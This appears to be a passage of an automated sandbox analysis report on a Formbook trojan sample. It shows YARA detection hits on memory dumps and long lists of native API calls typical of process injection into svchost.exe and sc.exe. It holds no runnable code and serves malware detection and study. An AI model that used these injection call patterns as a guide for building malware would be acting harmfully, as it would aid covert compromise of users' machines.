            Source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C063 NtClose,2_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F4340 NtSetContextThread,LdrInitializeThunk,4_2_035F4340
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F4650 NtSuspendThread,LdrInitializeThunk,4_2_035F4650
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2B60 NtClose,LdrInitializeThunk,4_2_035F2B60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_035F2BF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_035F2BE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_035F2BA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2AD0 NtReadFile,LdrInitializeThunk,4_2_035F2AD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2AF0 NtWriteFile,LdrInitializeThunk,4_2_035F2AF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2F30 NtCreateSection,LdrInitializeThunk,4_2_035F2F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2FE0 NtCreateFile,LdrInitializeThunk,4_2_035F2FE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2FB0 NtResumeThread,LdrInitializeThunk,4_2_035F2FB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_035F2EE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_035F2E80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_035F2D10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_035F2D30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2DD0 NtDelayExecution,LdrInitializeThunk,4_2_035F2DD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_035F2DF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_035F2C70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2C60 NtCreateKey,LdrInitializeThunk,4_2_035F2C60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_035F2CA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F35C0 NtCreateMutant,LdrInitializeThunk,4_2_035F35C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F39B0 NtGetContextThread,LdrInitializeThunk,4_2_035F39B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2B80 NtQueryInformationFile,4_2_035F2B80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2AB0 NtWaitForSingleObject,4_2_035F2AB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2F60 NtCreateProcessEx,4_2_035F2F60
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2F90 NtProtectVirtualMemory,4_2_035F2F90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2FA0 NtQuerySection,4_2_035F2FA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2E30 NtWriteVirtualMemory,4_2_035F2E30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2EA0 NtAdjustPrivilegesToken,4_2_035F2EA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2D00 NtSetInformationFile,4_2_035F2D00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2DB0 NtEnumerateKey,4_2_035F2DB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2C00 NtQueryInformationProcess,4_2_035F2C00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2CC0 NtQueryVirtualMemory,4_2_035F2CC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F2CF0 NtOpenProcess,4_2_035F2CF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F3010 NtOpenDirectoryObject,4_2_035F3010
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F3090 NtSetValueKey,4_2_035F3090
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F3D70 NtOpenThread,4_2_035F3D70
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F3D10 NtOpenProcessToken,4_2_035F3D10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B98E40 NtCreateFile,4_2_02B98E40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B98FB0 NtReadFile,4_2_02B98FB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B992C0 NtAllocateVirtualMemory,4_2_02B992C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B990A0 NtDeleteFile,4_2_02B990A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B99150 NtClose,4_2_02B99150
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_033DFBBE NtSetContextThread,4_2_033DFBBE
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0403A6400_2_0403A640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FB32_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8432_2_0040F843
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F83A2_2_0040F83A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004040B52_2_004040B5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161832_2_00416183
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FA632_2_0040FA63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012302_2_00401230
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022D02_2_004022D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DAD92_2_0040DAD9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DAE32_2_0040DAE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C902_2_00402C90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6C32_2_0042E6C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD22_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD52_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367A3524_2_0367A352
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036803E64_2_036803E6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035CE3F04_2_035CE3F0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036602744_2_03660274
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036402C04_2_036402C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036481584_2_03648158
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035B01004_2_035B0100
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0365A1184_2_0365A118
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036781CC4_2_036781CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036801AA4_2_036801AA
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036741A24_2_036741A2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036520004_2_03652000
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035E47504_2_035E4750
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C07704_2_035C0770
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035BC7C04_2_035BC7C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035DC6E04_2_035DC6E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C05354_2_035C0535
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036805914_2_03680591
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036724464_2_03672446
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036644204_2_03664420
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0366E4F64_2_0366E4F6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367AB404_2_0367AB40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03676BD74_2_03676BD7
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035BEA804_2_035BEA80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035D69624_2_035D6962
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0368A9A64_2_0368A9A6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C29A04_2_035C29A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035CA8404_2_035CA840
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C28404_2_035C2840
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035EE8F04_2_035EE8F0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035A68B84_2_035A68B8
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03634F404_2_03634F40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03602F284_2_03602F28
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03662F304_2_03662F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035E0F304_2_035E0F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035B2FC84_2_035B2FC8
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035CCFE04_2_035CCFE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0363EFA04_2_0363EFA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C0E594_2_035C0E59
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367EE264_2_0367EE26
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367EEDB4_2_0367EEDB
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035D2E904_2_035D2E90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367CE934_2_0367CE93
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035CAD004_2_035CAD00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0365CD1F4_2_0365CD1F
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035BADE04_2_035BADE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035D8DBF4_2_035D8DBF
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C0C004_2_035C0C00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035B0CF24_2_035B0CF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03660CB54_2_03660CB5
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035AD34C4_2_035AD34C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367132D4_2_0367132D
